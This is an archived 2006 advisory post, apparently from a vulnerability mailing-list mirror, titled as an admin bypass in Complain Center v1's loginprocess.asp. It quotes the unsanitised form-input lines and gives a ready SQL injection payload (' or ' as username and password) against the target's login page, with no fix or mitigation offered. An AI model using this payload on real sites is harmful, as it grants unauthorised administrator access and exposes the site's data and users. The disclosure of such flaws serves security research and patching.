Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

easypage.org >> v7 sql injection

Limbo - Lite Mambo CMS Multiple Vulnerabilities

Roller Weblogger XSS vulnerability

BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	18.09.2006
Subject:	Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey